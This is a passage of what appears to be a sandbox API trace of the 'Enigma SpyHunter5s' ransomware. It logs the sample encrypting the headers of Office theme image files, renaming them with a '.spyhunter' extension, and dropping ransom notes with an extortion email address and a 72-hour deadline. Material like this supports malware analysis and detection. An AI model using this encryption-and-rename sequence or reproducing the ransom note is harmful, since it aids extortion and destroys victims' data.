lpNumberOfBytesWritten=0x25cfe34, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfe34*=0x2ac, lpOverlapped=0x0) returned 1 [0090.135] CloseHandle (hObject=0x178) returned 1 [0090.135] GetProcessHeap () returned 0x2c0000 [0090.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354338 | out: hHeap=0x2c0000) returned 1 [0090.135] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfdd0 | out: pbBuffer=0x25cfdd0) returned 1 [0090.135] GetProcessHeap () returned 0x2c0000 [0090.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0090.135] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfdc8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfdc8*=0x30) returned 1 [0090.135] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0090.140] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 81 [0090.140] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.140] GetProcessHeap () returned 0x2c0000 [0090.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x345830 [0090.140] ReadFile (in: hFile=0xcc, lpBuffer=0x345830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd8c, lpOverlapped=0x0 | out: lpBuffer=0x345830*, lpNumberOfBytesRead=0x25cfd8c*=0x2800, lpOverlapped=0x0) returned 1 [0090.227] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.227] WriteFile (in: hFile=0xcc, lpBuffer=0x345830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfd8c, lpOverlapped=0x0 | out: lpBuffer=0x345830*, lpNumberOfBytesWritten=0x25cfd8c*=0x2800, lpOverlapped=0x0) returned 1 [0090.227] GetProcessHeap () returned 0x2c0000 [0090.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345830 | out: hHeap=0x2c0000) returned 1 [0090.227] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.227] WriteFile (in: hFile=0xcc, lpBuffer=0x25cfdcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd8c, lpOverlapped=0x0 | out: lpBuffer=0x25cfdcc*, lpNumberOfBytesWritten=0x25cfd8c*=0x4, lpOverlapped=0x0) returned 1 [0090.227] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd8c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd8c*=0x30, lpOverlapped=0x0) returned 1 [0090.227] CloseHandle (hObject=0xcc) returned 1 [0090.228] GetProcessHeap () returned 0x2c0000 [0090.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.229] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.spyhunter") returned 91 [0090.229] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.spyhunter")) returned 1 [0090.231] GetProcessHeap () returned 0x2c0000 [0090.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.231] GetProcessHeap () returned 0x2c0000 [0090.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0090.231] GetProcessHeap () returned 0x2c0000 [0090.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3440b8 | out: hHeap=0x2c0000) returned 1 [0090.231] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfdd0 | out: pbBuffer=0x25cfdd0) returned 1 [0090.231] GetProcessHeap () returned 0x2c0000 [0090.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0090.231] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfdc8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfdc8*=0x30) returned 1 [0090.231] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0090.256] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 80 [0090.256] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0090.256] GetProcessHeap () returned 0x2c0000 [0090.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0090.256] ReadFile (in: hFile=0x170, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd8c, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x25cfd8c*=0x618, lpOverlapped=0x0) returned 1 [0090.267] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff9e8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.267] WriteFile (in: hFile=0x170, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x25cfd8c, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x25cfd8c*=0x618, lpOverlapped=0x0) returned 1 [0090.267] GetProcessHeap () returned 0x2c0000 [0090.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0090.267] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.267] WriteFile (in: hFile=0x170, lpBuffer=0x25cfdcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd8c, lpOverlapped=0x0 | out: lpBuffer=0x25cfdcc*, lpNumberOfBytesWritten=0x25cfd8c*=0x4, lpOverlapped=0x0) returned 1 [0090.267] WriteFile (in: hFile=0x170, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd8c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd8c*=0x30, lpOverlapped=0x0) returned 1 [0090.268] CloseHandle (hObject=0x170) returned 1 [0090.268] GetProcessHeap () returned 0x2c0000 [0090.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.268] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.spyhunter") returned 90 [0090.269] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.spyhunter")) returned 1 [0090.269] GetProcessHeap () returned 0x2c0000 [0090.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.269] GetProcessHeap () returned 0x2c0000 [0090.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0090.269] GetProcessHeap () returned 0x2c0000 [0090.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x343fc8 | out: hHeap=0x2c0000) returned 1 [0090.270] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0090.271] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0090.271] WriteFile (in: hFile=0x170, lpBuffer=0x25cfcff*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfe28, lpOverlapped=0x0 | out: lpBuffer=0x25cfcff*, lpNumberOfBytesWritten=0x25cfe28*=0x127, lpOverlapped=0x0) returned 1 [0090.272] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0090.272] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfe28, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfe28*=0x2ac, lpOverlapped=0x0) returned 1 [0090.272] CloseHandle (hObject=0x170) returned 1 [0090.272] GetProcessHeap () returned 0x2c0000 [0090.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x344928 | out: hHeap=0x2c0000) returned 1 [0090.272] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfdc8 | out: pbBuffer=0x25cfdc8) returned 1 [0090.272] GetProcessHeap () returned 0x2c0000 [0090.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0090.272] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfdc0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfdc0*=0x30) returned 1 [0090.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0090.275] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 79 [0090.276] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.276] GetProcessHeap () returned 0x2c0000 [0090.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0090.276] ReadFile (in: hFile=0x170, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd84, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x25cfd84*=0x2800, lpOverlapped=0x0) returned 1 [0090.303] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.303] WriteFile (in: hFile=0x170, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfd84, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x25cfd84*=0x2800, lpOverlapped=0x0) returned 1 [0090.303] GetProcessHeap () returned 0x2c0000 [0090.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0090.303] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.303] WriteFile (in: hFile=0x170, lpBuffer=0x25cfdc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd84, lpOverlapped=0x0 | out: lpBuffer=0x25cfdc4*, lpNumberOfBytesWritten=0x25cfd84*=0x4, lpOverlapped=0x0) returned 1 [0090.353] WriteFile (in: hFile=0x170, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd84, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd84*=0x30, lpOverlapped=0x0) returned 1 [0090.353] CloseHandle (hObject=0x170) returned 1 [0090.354] GetProcessHeap () returned 0x2c0000 [0090.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.354] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.spyhunter") returned 89 [0090.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.spyhunter")) returned 1 [0090.364] GetProcessHeap () returned 0x2c0000 [0090.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.364] GetProcessHeap () returned 0x2c0000 [0090.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0090.364] GetProcessHeap () returned 0x2c0000 [0090.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x374ec8 | out: hHeap=0x2c0000) returned 1 [0090.365] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0090.365] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0090.365] WriteFile (in: hFile=0x170, lpBuffer=0x25cfcf7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfe20, lpOverlapped=0x0 | out: lpBuffer=0x25cfcf7*, lpNumberOfBytesWritten=0x25cfe20*=0x127, lpOverlapped=0x0) returned 1 [0090.366] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0090.366] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfe20, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfe20*=0x2ac, lpOverlapped=0x0) returned 1 [0090.366] CloseHandle (hObject=0x170) returned 1 [0090.366] GetProcessHeap () returned 0x2c0000 [0090.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354338 | out: hHeap=0x2c0000) returned 1 [0090.366] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfdc0 | out: pbBuffer=0x25cfdc0) returned 1 [0090.366] GetProcessHeap () returned 0x2c0000 [0090.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0090.366] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfdb8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfdb8*=0x30) returned 1 [0090.367] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0090.367] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 80 [0090.367] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.367] GetProcessHeap () returned 0x2c0000 [0090.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x340fe8 [0090.367] ReadFile (in: hFile=0x170, lpBuffer=0x340fe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd7c, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesRead=0x25cfd7c*=0x2800, lpOverlapped=0x0) returned 1 [0090.378] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.379] WriteFile (in: hFile=0x170, lpBuffer=0x340fe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfd7c, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesWritten=0x25cfd7c*=0x2800, lpOverlapped=0x0) returned 1 [0090.379] GetProcessHeap () returned 0x2c0000 [0090.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0090.379] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.379] WriteFile (in: hFile=0x170, lpBuffer=0x25cfdbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd7c, lpOverlapped=0x0 | out: lpBuffer=0x25cfdbc*, lpNumberOfBytesWritten=0x25cfd7c*=0x4, lpOverlapped=0x0) returned 1 [0090.394] WriteFile (in: hFile=0x170, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd7c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd7c*=0x30, lpOverlapped=0x0) returned 1 [0090.394] CloseHandle (hObject=0x170) returned 1 [0090.395] GetProcessHeap () returned 0x2c0000 [0090.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0090.396] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.spyhunter") returned 90 [0090.396] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.spyhunter")) returned 1 [0090.398] GetProcessHeap () returned 0x2c0000 [0090.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0090.398] GetProcessHeap () returned 0x2c0000 [0090.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0090.398] GetProcessHeap () returned 0x2c0000 [0090.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x344bf8 | out: hHeap=0x2c0000) returned 1 [0090.398] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0090.399] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0090.399] WriteFile (in: hFile=0x170, lpBuffer=0x25cfcef*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfe18, lpOverlapped=0x0 | out: lpBuffer=0x25cfcef*, lpNumberOfBytesWritten=0x25cfe18*=0x127, lpOverlapped=0x0) returned 1 [0090.400] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0090.400] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfe18, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfe18*=0x2ac, lpOverlapped=0x0) returned 1 [0090.400] CloseHandle (hObject=0x170) returned 1 [0090.401] GetProcessHeap () returned 0x2c0000 [0090.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354af8 | out: hHeap=0x2c0000) returned 1 [0090.401] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfdb8 | out: pbBuffer=0x25cfdb8) returned 1 [0090.401] GetProcessHeap () returned 0x2c0000 [0090.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0090.401] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfdb0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfdb0*=0x30) returned 1 [0090.401] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0090.426] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 81 [0090.426] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.426] GetProcessHeap () returned 0x2c0000 [0090.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0090.426] ReadFile (in: hFile=0xcc, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd74, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x25cfd74*=0x2800, 